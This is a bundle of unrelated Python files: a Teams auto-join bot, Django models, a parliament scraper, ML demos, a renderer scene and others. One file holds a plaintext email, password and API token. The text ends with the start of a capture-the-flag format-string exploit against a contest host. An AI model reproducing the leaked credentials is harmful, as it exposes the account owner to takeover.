                        meeting_id = meeting_element.get_attribute("id")
                        meetings.append(Meeting(id_=meeting_id,
                                                title=f"{team.name} -> {channel.name}",
                                                channel=channel.id_))
        return meetings
    def connect(self, meeting):
        """Join *meeting*: open its channel, click Join, mute camera and mic."""
        conversations = "https://teams.microsoft.com/_#/conversations/a"
        script = f'window.location = "{conversations}a?threadId={meeting.channel}&ctx=channel";'
        fn.browser.execute_script(script)
        self.go_to_teams()
        btn_selector = f"div[id='{meeting.id_}'] > calling-join-button > button"
        join_btn = fn.query_selector(btn_selector, 5)
        if join_btn is None:
            return None
        # Click the join button via JavaScript.
        fn.browser.execute_script("arguments[0].click()", join_btn)
        join_now_btn = fn.query_selector("button[data-tid='prejoin-join-button']", 30)
        if join_now_btn is None:
            return None
        # Turn off the camera
        selector = "toggle-button[data-tid='toggle-video']>div>button"
        video_btn = fn.browser.find_element_by_css_selector(selector)
        video_is_on = video_btn.get_attribute("aria-pressed")
        if video_is_on == "true": # "true" must be a string
            video_btn.click()
            print("> Turned off the Video.")
        # Turn off the microphone
        selector = "toggle-button[data-tid='toggle-mute']>div>button"
        audio_btn = fn.browser.find_element_by_css_selector(selector)
        audio_is_on = audio_btn.get_attribute("aria-pressed")
        if audio_is_on == "true": # Not a mistake!
            audio_btn.click()
            print("> Turned off the Audio.")
        # Avoid StaleElementReferenceException
        selector = "button[data-tid='prejoin-join-button']"
        join_now_btn = fn.query_selector(selector, 5)
        if join_now_btn is None:
            return None
        join_now_btn.click()
        print(f"> Just have joined the meeting on {meeting}")
from django.db import models
from django.utils.timezone import now
from django_extensions.db.models import TimeStampedModel, ActivatorModel
from simple_history.models import HistoricalRecords
class Product(TimeStampedModel, ActivatorModel):
    """Product model (상품) with activation state and edit history."""

    class Size(models.TextChoices):
        # Cup sizes; the empty value means "no size selected".
        null = ""
        Tall = "tall"
        Grande = "grande"
        Venti = "venti"

    pd_num = models.CharField("상품번호", max_length=100, unique=True, db_index=True)
    name = models.CharField("상품명", max_length=200)
    price = models.IntegerField("가격", default=0)
    size = models.CharField(
        "사이즈", choices=Size.choices, max_length=8, blank=True, default=""
    )
    kind = models.ForeignKey(
        "logistics.kind",
        verbose_name="상품종류",
        related_name="kind_set",
        on_delete=models.CASCADE,
    )
    history = HistoricalRecords(history_change_reason_field=models.TextField(null=True))

    class Meta:
        verbose_name = "상품"
        verbose_name_plural = "상품 목록"
        ordering = ["pd_num"]

    def __str__(self):
        return f"{self.pd_num} {self.name}"

    def save(self, *args, **kwargs):
        """Save the product, defaulting activate_date to now.

        Accepts an optional ``update_modified`` kwarg to suppress the
        TimeStampedModel "modified" timestamp update.
        """
        self.update_modified = kwargs.pop(
            "update_modified", getattr(self, "update_modified", True)
        )
        if not self.activate_date:
            self.activate_date = now()
        # BUG FIX: positional args were previously dropped
        # (super().save(**kwargs)); forward them so calls like
        # save(force_insert) keep working.
        super().save(*args, **kwargs)
|
# Generated by Django 2.2.7 on 2019-12-02 18:12
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create UserTeacher: a 1:1 link between an auth user and a Teacher."""

    dependencies = [
        ('organization', '0006_auto_20191123_1738'),
        # swappable_dependency tracks whichever model AUTH_USER_MODEL points at.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('operation', '0005_auto_20191127_1714'),
    ]
    operations = [
        migrations.CreateModel(
            name='UserTeacher',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_time', models.DateTimeField(auto_now_add=True)),
                ('teacher', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='organization.Teacher', verbose_name='教师信息')),
                ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='可登录用户信息')),
            ],
        ),
    ]
|
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB, GaussianNB
from sklearn.datasets import load_wine
class mainFunc():
    """Load the sklearn wine dataset and compare two Naive Bayes models."""
    def __init__(self):
        # Pipeline: load -> (treat, currently disabled) -> train.
        self.proc_LoadData()
        #self.proc_TreatData()
        self.proc_TrainModel()
    def proc_LoadData(self, test=True):
        """Load the wine dataset into self.dataBin with a 'target' column."""
        wine = load_wine()
        frame = pd.DataFrame(wine.data, columns=wine.feature_names)
        frame['target'] = wine.target
        self.dataBin = frame
        if test:
            print(self.dataBin)
            print()
    def proc_TreatData(self, test=False):
        """Placeholder for feature preprocessing (not implemented)."""
        pass
    def proc_TrainModel(self, randomize=False):
        """Fit Gaussian and Multinomial NB on a 75/25 split; print scores."""
        self.X = self.dataBin.drop('target', axis='columns')
        self.y = self.dataBin.target
        X_a, X_b, y_a, y_b = train_test_split(self.X, self.y, test_size=0.25)
        self.model = GaussianNB()
        self.model.fit(X_a, y_a)
        print(self.model.score(X_b, y_b))
        self.modelb = MultinomialNB()
        self.modelb.fit(X_a, y_a)
        print(self.modelb.score(X_b, y_b))
mainFunc()
# -*- coding: utf-8 -*-
# @Time : 2019-01-23 11:29
# @Author : luomingming
from openpyxl import Workbook
class ExcelExporter:
    """Base exporter that pages through get_list() and writes rows to xlsx.

    Subclasses must implement get_list() and assemble_row().
    """
    def __init__(self):
        self.wb = Workbook()

    def export(self, row0, file):
        """Write header row *row0*, then every page of data, and save.

        :param row0: sequence of header cell values (written to row 1)
        :param file: output path handed to openpyxl's Workbook.save
        """
        sheet = self.wb.active
        # Header row; openpyxl rows/columns are 1-based.
        for column, title in enumerate(row0, start=1):
            sheet.cell(row=1, column=column).value = title
        page_index = 1
        row = 2
        # Pull pages until get_list() returns an empty/falsy page.
        while True:
            rt = self.get_list(page_index)
            if not rt:
                break
            for data in rt:
                self.assemble_row(sheet, data, row)
                row = row + 1
            page_index = page_index + 1
        self.wb.save(file)

    def get_list(self, page_index):
        """Return the records for 1-based page *page_index*; override in subclass."""
        # NotImplementedError (a subclass of Exception) keeps existing
        # `except Exception` callers working while using the idiomatic type.
        raise NotImplementedError('get_list must be implemented by a subclass')

    def assemble_row(self, sheet, data, row):
        """Write one record *data* into *sheet* at *row*; override in subclass."""
        raise NotImplementedError('assemble_row must be implemented by a subclass')

    def set_cell(self, sheet, val, row, col):
        """Convenience helper: assign *val* to cell (row, col)."""
        cell = sheet.cell(row=row, column=col)
        cell.value = val
|
# coding=utf-8
import scraperwiki
import lxml.html
import sqlite3
import re
# Base listing URL; pagination is driven by the ?start= offset appended below.
BASE_URL = 'http://parliament.go.ke/the-senate/senators?start='
# Honorific string (as shown on the site) -> Wikidata item.
HONORIFIC_MAP = {
    'Sen.': 'Q47515115'
}
# Party code (as printed on the site) -> Wikidata item.
PARTY_MAP = {
    'N/A': '', # N/A
    'ANC': 'Q47489380', # Amani National Congress
    'CCM': 'Q47492863', # Chama Cha Mashinani
    'EFP': 'Q42954840', # Economic Freedom Party
    'FAP': 'Q47492871', # Frontier Alliance Party
    'FORD-K': 'Q5473121', # Forum for the Restoration of Democracy – Kenya
    'FORD - K': 'Q5473121', # Forum for the Restoration of Democracy – Kenya
    'IND': 'Q327591', # Independent
    'JP': 'Q27963537', # Jubilee Party of Kenya
    'KANU': 'Q1422517', # Kenya African National Union
    'KPP': 'Q47492848', # Kenya Patriots Party
    'MCCP': 'Q47489396', # Maendeleo Chap Chap Party
    'NAPK': 'Q47492879', # National Agenda Party of Kenya
    'ODM': 'Q1640905', # Orange Democratic Movement
    'PDR': 'Q7141057', # Party of Development and Reforms
    'PNU': 'Q2559675', # Party of National Unity
    'WDM-K': 'Q5251223', # Wiper Democratic Movement
    'PDP': 'Q22666200', # Peoples Democratic Party
    'CCU': 'Q5069325', # Chama Cha Uzalendo
    'KNC': 'Q6392670', # Kenya National Congress
    'DP': 'Q3272441', # Democratic Party
    'ND': 'Q47490108', # New Democrats
    'MUUNGANO': 'Q22666185', # Muungano Party
}
# We maintain an internal map of counties and constituencies to WD items.
# TODO: This should really live somewhere else
COUNTY_MAP = {
    'Baringo': 'Q808201',
    'Bomet': 'Q891952',
    'Bungoma': 'Q2928204',
    'Busia': 'Q1017519',
    'Elgeyo Marakwet': 'Q15216433',
    'Embu': 'Q1335242',
    'Garisa': 'Q1494292',
    'Homa Bay': 'Q1625834',
    'Isiolo': 'Q1499046',
    'Kajiado': 'Q285072',
    'Kakamega': 'Q1721867',
    'Kericho': 'Q1739252',
    'Kiambu': 'Q2575594',
    'Kilifi': 'Q1741307',
    'Kirinyaga': 'Q2230311',
    'Kisii': 'Q1743730',
    'Kisumu': 'Q1743809',
    'Kitui': 'Q1722597',
    'Kwale': 'Q952571',
    'Laikipia': 'Q1800699',
    'Lamu': 'Q1951652',
    'Machakos': 'Q1882639',
    'Makueni': 'Q473717',
    'Mandera': 'Q1477874',
    'Marsabit': 'Q1323683',
    'Meru': 'Q15045704',
    'Migori': 'Q429955',
    'Mombasa': 'Q1112885',
    'Murang\'a': 'Q1781723',
    'Nairobi': 'Q3335223',
    'Nakuru': 'Q1852202',
    'Nandi': 'Q1964569',
    'Narok': 'Q1852220',
    'Nyamira': 'Q1569613',
    'Nyandarua': 'Q1714352',
    'Nyeri': 'Q749665',
    'Samburu': 'Q2096419',
    'Siaya': 'Q3482913',
    'Taita Taveta': 'Q7193788',
    'Tana River': 'Q383150',
    'Tharaka Nithi': 'Q2189432',
    'Trans Nzoia': 'Q1278653',
    'Turkana': 'Q1633078',
    'Uasin Gishu': 'Q1121429',
    'Vihiga': 'Q1313202',
    'Wajir': 'Q1852209',
    'West Pokot': 'Q590860',
}
# Accumulators filled by the scrape loop below.
parsedMembers = []
unreconciledCounties = []
unreconciledParties = []
# The senators listing is paginated: PAGES pages of PER_PAGE rows each.
PAGES = 4
PER_PAGE = 20
def cleanup(string):
    """Normalise a scraped string: trim whitespace, straighten curly apostrophes."""
    return string.strip().replace(u'\u2019', "'")
# Scrape each listing page and build one dict per senator.
# NOTE: this file is Python 2 (bare print statements appear below).
for x in range(0, PAGES):
    pageStart = PER_PAGE * x
    scrapeUrl = BASE_URL + str(pageStart)
    print('(i) Scraping from ' + scrapeUrl)
    # Get the page!
    html = scraperwiki.scrape(scrapeUrl)
    ssRoot = lxml.html.fromstring(html)
    rows = ssRoot.cssselect('tr')
    # Skip the header row
    for row in rows[1:]:
        memberData = {}
        nameLink = row.cssselect('a')[0]
        nameUnparsed = nameLink.text.strip()
        # Name cell reads "<honorific> <surname> <rest>"; reorder to
        # "<rest> <surname>" for the stored name.
        nameRegex = re.search('(.+?) (.+?) (.+)', nameUnparsed)
        memberData['honorific_string'] = nameRegex.group(1)
        memberData['honorific_id'] = HONORIFIC_MAP[nameRegex.group(1)]
        memberData['name'] = cleanup(nameRegex.group(3) + ' ' + nameRegex.group(2))
        print(' ' + memberData['name'])
        # Member id is the last segment of the profile link.
        linkHref = nameLink.attrib['href']
        idRegex = re.search('\/the-senate\/senators\/item\/(.+)', linkHref)
        memberData['id'] = idRegex.group(1)
        memberData['url'] = cleanup('http://parliament.go.ke/the-senate/senators/item/' + memberData['id'])
        partyCode = cleanup(row.cssselect('td')[4].text)
        memberData['party'] = partyCode
        if partyCode in PARTY_MAP:
            memberData['party_id'] = PARTY_MAP[partyCode]
        else:
            # Unknown party code: record it verbatim for later reconciliation.
            memberData['party_id'] = 'Code: "{}"'.format(partyCode)
            unreconciledParties.append(partyCode)
        electoralStatus = cleanup(row.cssselect('td')[5].text)
        if electoralStatus == 'Elected':
            # We only need to account for location if the person is elected.
            # Nominees don't have these things, but are still members.
            county = cleanup(row.cssselect('td')[2].text)
            memberData['county'] = county
            if county in COUNTY_MAP:
                memberData['district_id'] = COUNTY_MAP[county]
            else:
                memberData['district_id'] = 'County: "{}"'.format(county)
                unreconciledCounties.append(county)
                print(' > Unreconciled county: ' + county)
        parsedMembers.append(memberData)
    print '(i) Counted {} Members so far...'.format(len(parsedMembers))
print('(i) Done.')
print '(i) Counted {} Members in total'.format(len(parsedMembers))
print '<!> {} unreconciled counties:'.format(len(unreconciledCounties))
print unreconciledCounties
print '<!> {} unreconciled parties:'.format(len(unreconciledParties))
print unreconciledParties
# Clear any previous run's rows; the table may not exist yet on first run.
try:
    scraperwiki.sqlite.execute('DELETE FROM data')
except sqlite3.OperationalError:
    pass
scraperwiki.sqlite.save(
    unique_keys=['id'],
    data=parsedMembers)
|
from django.urls import path,include
from . import views
# URL routes for this app; the route names are used for reverse lookups
# (e.g. {% url %} tags and reverse()).
urlpatterns = [
    path('<int:question_id>', views.question,name="question"),
    path('search/',views.search,name="search"),
    path('new/',views.new,name="new"),
    path('delete/<int:question_id>',views.delete, name="delete"),
    path('edit/<int:question_id>',views.edit, name="edit"),
    path('attend/',views.attend, name = "attend"),
    path('my_question',views.my_question, name = "my_question"),
]
|
import os
from glob import glob
from src.net import Mode
from src.flownet2.flownet2 import FlowNet2
FLAGS = None
def main(num_frames=100):
    """Run FlowNet2 over consecutive image pairs and save optical-flow images.

    :param num_frames: maximum number of frame pairs to process. Defaults to
        100 (the original hard-coded loop bound) and is clamped to the number
        of available consecutive pairs, fixing the IndexError the original
        raised when fewer than 101 images were found.
    """
    folder = 'HMB_1'
    img_dir = [y for x in os.walk('/media/astra/1TB/Data/Ch2_002/{}/resized'.format(folder)) for y in glob(os.path.join(x[0], '*.png'))]
    img_dir.sort()
    # Create a new network
    net = FlowNet2(mode=Mode.TEST, debug=False)
    out_dir = '/media/astra/1TB/Data/Ch2_002/{}/of/'.format(folder)
    # Each step consumes frames (i, i+1), so at most len(img_dir)-1 pairs exist.
    for i in range(min(num_frames, len(img_dir) - 1)):
        net.test(checkpoint='./checkpoints/FlowNet2/flownet-2.ckpt-0',
                 input_a_path=img_dir[i],
                 input_b_path=img_dir[i+1],
                 out_path=out_dir + 'opflow_{0:06d}.png'.format(i))
        if i % 10 == 0:
            print("Total {} images, now {}th image".format(len(img_dir), i))
if __name__ == '__main__':
    main()
#!/usr/bin/python
import math
"""Class"""
class Number(object):
    """Wraps a numeric value and supports +, -, * and / between wrapped numbers."""

    def __init__(self, value):
        self.__value = value

    def set_value(self, sum):
        # NOTE: parameter name kept as `sum` for backward compatibility,
        # even though it shadows the builtin.
        self.__value = sum

    def get_value(self):
        return self.__value

    # Operator overloads: each returns a new Number, leaving operands unchanged.
    def __add__(self, other):
        return Number(self.__value + other.__value)

    def __sub__(self, other):
        return Number(self.__value - other.__value)

    def __mul__(self, other):
        return Number(self.__value * other.__value)

    def __div__(self, other):
        # Python 2 division hook.
        return Number(self.__value / other.__value)

    # BUG FIX: Python 3 dispatches the / operator to __truediv__, so division
    # silently stopped working under Python 3. Alias it to the same logic.
    __truediv__ = __div__

    def __str__(self):
        return str(self.__value)
|
from django.test import TestCase
from datetime import datetime
from time import sleep
import json
from . import views
class ApiTestClass(TestCase):
    """Tests for the ping and timestamp API endpoints."""
    # integration
    def test_ping(self):
        # /api/ping must answer 200 with the literal body "pong".
        response = self.client.get('/api/ping')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'pong')
    def test_get_timestamp_returns_200(self):
        response = self.client.get('/api/timestamp')
        self.assertEqual(response.status_code, 200)
    def test_get_timestamp_can_update(self):
        # Two calls 2 seconds apart must not return identical bodies.
        r1 = self.client.get('/api/timestamp')
        sleep(2)
        r2 = self.client.get('/api/timestamp')
        self.assertNotEqual(r1.content, r2.content)
    # unit
    def test_get_timestamp_returns_correct_content(self):
        # Inject a fixed clock so the expected string is deterministic.
        date = datetime(1990, 3, 20, 19, 59, 29)
        response = views.get_timestamp(None, lambda: date)
        body = json.loads(response.content)
        self.assertTrue('currentTime' in body.keys())
        self.assertEqual(response['Content-Type'], 'application/json')
        self.assertEqual(body.get('currentTime'), '1990-03-20 19:59:29')
|
import curses
from npyscreen import npysThemeManagers as ThemeManagers
class BlueTheme(ThemeManagers.ThemeManager):
    """npyscreen theme with a predominantly white-on-blue palette.

    _colors_to_define registers (name, foreground, background) curses colour
    pairs; default_colors maps npyscreen's semantic roles onto those pairs.
    """
    _colors_to_define = (
        ('WHITE_BLUE', curses.COLOR_WHITE, curses.COLOR_BLUE),
        ('BLUE_WHITE', curses.COLOR_BLUE, curses.COLOR_WHITE),
        ('BLACK_BLUE', curses.COLOR_BLACK,curses.COLOR_BLUE),
        ('CYAN_BLUE', curses.COLOR_CYAN, curses.COLOR_BLUE),
        ('GREEN_BLUE', curses.COLOR_GREEN, curses.COLOR_BLUE),
        ('MAGENTA_BLUE', curses.COLOR_MAGENTA, curses.COLOR_BLUE),
        ('RED_BLUE', curses.COLOR_RED, curses.COLOR_BLUE),
        ('YELLOW_BLUE', curses.COLOR_YELLOW, curses.COLOR_BLUE),
        ('YELLOW_WHITE', curses.COLOR_YELLOW, curses.COLOR_WHITE),
        ('BLACK_RED', curses.COLOR_BLACK, curses.COLOR_RED),
        ('BLACK_GREEN', curses.COLOR_BLACK, curses.COLOR_GREEN),
        ('BLACK_YELLOW', curses.COLOR_BLACK, curses.COLOR_YELLOW),
    )
    default_colors = {
        'DEFAULT': 'WHITE_BLUE',
        'FORMDEFAULT': 'WHITE_BLUE',
        'NO_EDIT': 'RED_BLUE',
        'STANDOUT': 'CYAN_BLUE',
        'CURSOR': 'WHITE_BLUE',
        'CURSOR_INVERSE': 'BLUE_WHITE',
        'LABEL': 'WHITE_BLUE',
        'LABELBOLD': 'YELLOW_BLUE',
        'CONTROL': 'YELLOW_BLUE',
        'IMPORTANT': 'RED_BLUE',
        'SAFE': 'GREEN_BLUE',
        'WARNING': 'YELLOW_BLUE',
        'DANGER': 'RED_BLUE',
        'CRITICAL': 'RED_BLUE',
        'GOOD': 'GREEN_BLUE',
        'GOODHL': 'GREEN_BLUE',
        'VERYGOOD': 'WHITE_BLUE',
        'CAUTION': 'YELLOW_BLUE',
        'CAUTIONHL': 'WHITE_BLUE',
        'HILIGHT': 'YELLOW_BLUE'
    }
|
#!python3
'''
This file is just for saving login details (in clear text)
To use, update the three member variables below to match
your login credentials
Updated token Nov 2020
Find latest details in LastPass.
'''
# SECURITY NOTE(review): plaintext credentials committed to source control;
# consider loading these from environment variables or a secrets store and
# rotating the exposed values.
user = 'dataoperations+1@summitps.org'
password = 'qxm&85U!w$'
token = 'Nuqf32C1SL0vhnLvP4e6V3Ks'
|
from scene_helper import *
import sys
# Wineglass scene description: builds object/light/camera lists and dumps
# them via scene_helper (star-imported above) for the renderer.
print('=== Wineglass Scene ===',file=sys.stderr)
# Output resolution (1080p)
w=1920
h=1080
obj=[]
light=[]
# Materials — presumably Material(diffuse, specular, roughness[, env]);
# exact parameter semantics live in scene_helper — TODO confirm.
#wall_mat=Material((0.9,0.9,0.9),(0.07,0.07,0.07),0.3)
blue_wall_mat=Material((0,0,1),(0,0,0.7),0.3)
red_wall_mat=Material((0.85,0,0),(0.07,0,0),0.3)
mr_mat=MirrorMaterial((0.95,0.95,0.95))
gold_metal_mat=Material((0.85,0.85,0.85),(0.03,0.03,0.03),0.1)
bg_glass_mat=GlassMaterial(1.55,(1,1,1),(0.8,0.9,0.9))
yellow_glass_mat=GlassMaterial(1.55,(1,1,1),(0.9,0.9,0.6))
blue_glass_mat=GlassMaterial(1.55,(1,1,1),(0.7,0.7,0.9))
red_glass_mat=GlassMaterial(1.55,(1,1,1),(0.9,0.8,0.7))
#bg_solid_glass_mat=SolidGlassMaterial(1.55,(1,1,1),(0.95,0.95,0.95))
bg_solid_glass_mat=SolidGlassMaterial(1.55,(1,1,1),(0.8,0.9,0.9))
wall_mat=Material(("chessboard.jpg",(0.2,0.2)),(0.04,0.04,0.04),0.3)
env_light_mat=Material((0.01,0.01,0.01),(0.03,0.03,0.03),0.8,'hdrsky_249.hdr')
#light_mat=Material((0.1,0.1,0.1),(0.1,0.1,0.1),0.3,"hdrsky_249.hdr")
wood_mat=Material(("wood.jpg",(0.1,0.1)),(0.04,0.04,0.04),0.2)
#light_mat=Material((1,1,1),(0.7,0.7,0.7),0.3,(100,100,100))
ball_mat=Material((0.85,0.85,0.85),(0.9,0.9,0.9),0.05)
#light.append(PointLightDecay((-15,13,18),(0.7*30,0.7*30,0.7*30)))
# 2D profile control points; the glass is a surface of revolution of this curve.
#wineglass_seq=[[-0.459543, -0.0], [-0.459544, -0.0], [-0.459545, -0.0], [-0.426747, 0.351882], [-0.278898, 0.848656], [0.084005, 1.112097], [1.105511, 1.164785], [2.328629, 0.991667], [2.50336, 1.029301], [2.3456, 1.0888], [1.1628, 1.278], [0.0552, 1.2148], [-0.3812, 0.9156], [-0.622, 0.3804], [-0.9684, 0.144], [-1.48, 0.0968], [-2.1124, 0.1284], [-2.2028, 0.3172], [-2.2628, 0.9944], [-2.3232, 1.2148], [-2.3984, 1.1992], [-2.4588, 1.0576], [-2.4588, 0.7112], [-2.4588, -0.0], [-2.458801, -0.0], [-2.458802, -0.0]]
glass_seq=[[-0.8, -0.459543], [-0.8, -0.459544], [-0.8, -0.459545], [-0.871882, -0.426747], [-0.948656, -0.278898], [-1.112097, 0.084005], [-1.164785, 1.105511], [-0.991667, 2.328629], [-1.029301, 2.50336], [-1.0888, 2.3456], [-1.278, 1.1628], [-1.2148, 0.0552], [-0.9156, -0.3812], [-0.3804, -0.522], [-0.0, -0.6684]]
# Large env-mapped sphere acting as the sky/environment light.
obj.append(Sphere((-13,2,9),25,env_light_mat))
#obj.append(Sphere((2,1,0),1,yellow_glass_mat))
obj.append(RotateBSpline([3,0.6684,3],glass_seq,blue_glass_mat))
#obj.append(Sphere((5,2,8),2,bg_solid_glass_mat))
obj.append(Sphere((5,2,8),2,bg_solid_glass_mat))
# Stanford bunny mesh, scaled x10 and translated, rendered as a mirror.
ParseObj("bunny_1k.obj",obj,lambda x:(x[0]*10,(x[1]-0.07)*10,x[2]*10-3),mr_mat)
#obj.append(Triangle((3,1,0),(3,5,0),(3,1,3),glass_mat))
# Ground plane with a wood texture.
obj.append(Plane((0,1,0),0,wood_mat))
#obj.append(Plane((1,0,0),7,wall_mat))
cam=PerspectiveCamera((-13,5,9),
(0.8968228648554929,-0.2638730619654009,-0.3550772914081536),
(0.2453429990417326,0.9645575115980382,-0.09713815385474979),w,h,1500)
setup={'obj':obj,'light':light,'cam':cam}
dump_setup(setup)
import serial
import Petduino
from time import sleep
import sys
def main():
    """Drive the Petduino's LED matrix through a looping frame animation."""
    # NOTE: Python 2 code (bare print statement below).
    try:
        # NOTE(review): '.\petduino.cfg' contains '\p', which is not an escape
        # sequence so the backslash survives literally; a raw string would
        # make that explicit.
        pet = Petduino.Petduino('.\petduino.cfg')
    except Petduino.UnhappyPetduino as sadness:
        print "There is a disturbance in the force: %s" % sadness
        # Wait for user input before exiting so the error stays visible.
        sys.stdin.read()
        sys.exit()
    # Each hex string encodes an 8x8 bitmap frame (one byte per row);
    # the sequence grows then shrinks, looping forever.
    while True:
        pet.setData("0000001800000000")
        sleep(0.1)
        pet.setData("00003C243C000000")
        sleep(0.1)
        pet.setData("007E42665A7E0000")
        sleep(0.1)
        pet.setData("FF81C3A59981FF00")
        sleep(0.5)
        pet.setData("007E42665A7E0000")
        sleep(0.1)
        pet.setData("00003C243C000000")
        sleep(0.1)
if __name__ == "__main__":
    main()
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 4 13:09:17 2020
@author: saiguna
Problem Statement: If you were to pick up points randomly from a square grid of dimension 6 x 6
and then find the distance of the point from the centre of the square, what is the mean distance
of the points from the centre of the square grid. It turns out that the mean distance is
actually the universal parabolic constant: sqrt(2) + log(1+sqrt(2)) ~ 2.2955
In this case, I obtain the result using Monte-Carlo runs. The result can also be derived as a closed form expression.
For more details refer to the twitter thread by Tamas Gorbe:
https://twitter.com/TamasGorbe/status/1246014582113492994
"""
import numpy as np
import matplotlib.pyplot as plt
plt.close('all')
# Monte-Carlo estimate: draw 1e7 points uniformly from the 6x6 square
# centred on the origin and histogram their distance from the centre.
numDataPoints = np.int32(1e7)
xCordinate = np.random.uniform(low=-3,high=+3,size=numDataPoints);
yCordinate = np.random.uniform(low=-3,high=+3,size=numDataPoints);
XYtuple = np.vstack((xCordinate,yCordinate)).T
# Euclidean distance of every point from the origin.
distFromOrigin = np.linalg.norm(XYtuple,axis=1);
# Round to 2 decimal places for display.
minDist = round(np.amin(distFromOrigin)*100)/100;
maxDist = round(np.amax(distFromOrigin)*100)/100;
numBins = np.int32(1e2)
counts,binEdges = np.histogram(distFromOrigin,bins=numBins);
binCentres = (binEdges[0:-1] + binEdges[1::])/2;
pmf = counts/np.sum(counts) # probability mass function
meanDistanceFromOrigin = np.sum(binCentres*pmf) # expectation = weighted sum of values
# np.amax of the scalar mean is a no-op; only the rounding matters here.
meanDistanceFromOrigin = round(np.amax(meanDistanceFromOrigin)*100)/100;
modeDistanceFromOrigin = round(binCentres[np.argmax(pmf)]*100)/100;
# plt.figure(1,figsize=(20,10));
# plt.title('Histogram of distance from origin');
# plt.hist(distFromOrigin,bins=numBins);
# # plt.axvline(minDist,color='k');
# # plt.axvline(maxDist,color='k');
# # plt.text(minDist,0,str(minDist))
# # plt.text(maxDist,0,str(maxDist))
# plt.xlabel('Distance from origin');
# plt.ylabel('Frequency of occurence');
# plt.grid(True)
# Plot the estimated density with min/max/mean/mode marked as vertical lines.
plt.figure(1,figsize=(20,10));
plt.title('probability density of distance from origin');
plt.plot(binCentres,pmf);
plt.axvline(minDist,linewidth=2,color='k');
plt.axvline(maxDist,linewidth=2,color='k');
plt.axvline(meanDistanceFromOrigin,linewidth=4, color='g');
plt.axvline(modeDistanceFromOrigin,linewidth=4, color='b');
plt.text(minDist,np.amax(pmf)/2,'Min: ' + str(minDist),fontsize=12)
plt.text(maxDist,np.amax(pmf)/2,'Max: ' + str(maxDist),fontsize=12)
plt.text(meanDistanceFromOrigin,np.amax(pmf)/2,'Mean: ' + str(meanDistanceFromOrigin),fontsize=12);
plt.text(modeDistanceFromOrigin,np.amax(pmf)/2,'Mode: ' + str(modeDistanceFromOrigin),fontsize=12)
plt.xlabel('Distance from origin');
plt.ylabel('probability of occurence');
plt.grid(True)
from __future__ import division
from abc import ABCMeta
import torch
import torch.nn as nn
from torch.autograd import Variable
from tasks.base import FormalTask
from models import VanillaModel
from controllers.feedforward import LinearSimpleStructController
from structs import Stack
class LanguageModelingTask(FormalTask):
"""
Abstract class for language modelling (word prediction) tasks. In a
LanguageModelingTask, the neural network must read each word of the
input sentence and predict the next word. The user may specify a set
of words such that the controller is only evaluated on predictions made
when the correct next word is drawn from that set.
This abstract class implements self._evaluate_step. Subclasses need
to implement functions relating to data generation.
Note that a BufferedModel will always be able to perform a
LanguageModelingTask with perfect accuracy because it can simply
output nothing during the first time step and then copy the input.
"""
    class Params(FormalTask.Params):
        """Parameters object for a LanguageModelingTask.
        New parameters are listed below.
        Attributes:
            to_predict: Set or list of unicode characters that should be
                predicted and used in accuracy computation.
            include_unpredicted_symbols_in_loss: If True, non-null symbols that
                are not in to_predict will contribute to loss.
            max_length: The maximum sentence length.
            mask_null: If True, null characters will always be ignored.
        """
        def __init__(self, to_predict, **kwargs):
            self.to_predict = to_predict
            self.include_unpredicted_symbols_in_loss = kwargs.get(
                "include_unpredicted_symbols_in_loss", False)
            self.max_length = kwargs.get("max_length", 25)
            self.mask_null = kwargs.get("mask_null", True)
            super(LanguageModelingTask.Params, self).__init__(**kwargs)
            # reduction="none" keeps per-position losses — presumably so
            # masking (see mask_null) can be applied afterwards; confirm.
            self.criterion = kwargs.get(
                "criterion", nn.CrossEntropyLoss(reduction="none"))
            # Test sentences may exceed the training max_length (via
            # test_override), so input length is sized to the larger value.
            if 'max_length' in self.test_override:
                self.max_x_length = max(
                    self.max_length, self.test_override['max_length'])
            else:
                self.max_x_length = self.max_length
            self.max_y_length = self.max_x_length
def __init__(self, params):
super(LanguageModelingTask, self).__init__(params)
self.to_predict_code = [self.alphabet[c] for c in self.to_predict]
def _evaluate_step(self, x, y, a, j):
"""
Computes the loss, number of guesses correct, and total number
of guesses when reading the jth symbol of the input string. If
the correct answer for a prediction does not appear in
self.to_predict, then we consider the loss for that prediction
to be 0.
:type x: Variable
:param x: The input data
:type y: Variable
:param y: The output data
:type a: Variable
:param a: The output of the neural network after reading the jth
word of the sentence, represented as a 2D vector. For each
i, a[i, :] is the controller's prediction for the (j + 1)st
word of the sentence, in one-hot representation
:type j: int
:param j: The jth word of a sentence is being read by the neural
controller when this function is called
:rtype: tuple
:return: The loss, number of correct guesses, and number of
total guesses after reading the jth word of the sentence
"""
_, y_pred = torch.max(a, 1)
if self.mask_null:
# Mask out the null stuff for loss calculation.
null = self.alphabet[self.null]
valid_x = (y[:, j] != null).float()
else:
# Include the null indices while calculating loss.
valid_x = torch.ones_like(y[:, j]).float()
# If we shouldn't include unpredicted symbols in the loss, zero them
# out.
if not self.include_unpredicted_symbols_in_loss:
for k in xrange(len(valid_x)):
if y[k, j].data.item() not in self.to_predict_code:
valid_x[k] = 0
# Compute the loss.
loss = valid_x * self.criterion(a, y[:, j])
# If we should include unpredicted terms in the loss, then we now need
# to mask them out for prediction and accuracy calculation.
if self.include_unpredicted_symbols_in_loss:
to_predict_x = valid_x.data.clone()
for k in xrange(len(valid_x)):
if y[k, j].data.item() not in self.to_predict_code:
to_predict_x[k] = 0
else:
to_predict_x = valid_x
# Compute the accuracy over indices of interest.
correct_trials = (y_pred == y[:, j]).type(torch.FloatTensor)
correct = sum(to_predict_x * correct_trials.data)
total = sum(to_predict_x)
return loss.sum(), correct, total
|
#!/usr/bin/env python
# Exploit for the TJCTF "poly" pwn challenge: a format-string
# vulnerability is used to overwrite GOT entries and spawn a shell.
from pwn import *

r = remote("p1.tjctf.org", 8003)
# Local-debug alternative (kept for reference):
# r = process("./poly")
# gdb.attach(r, '''
# set disable-randomization off
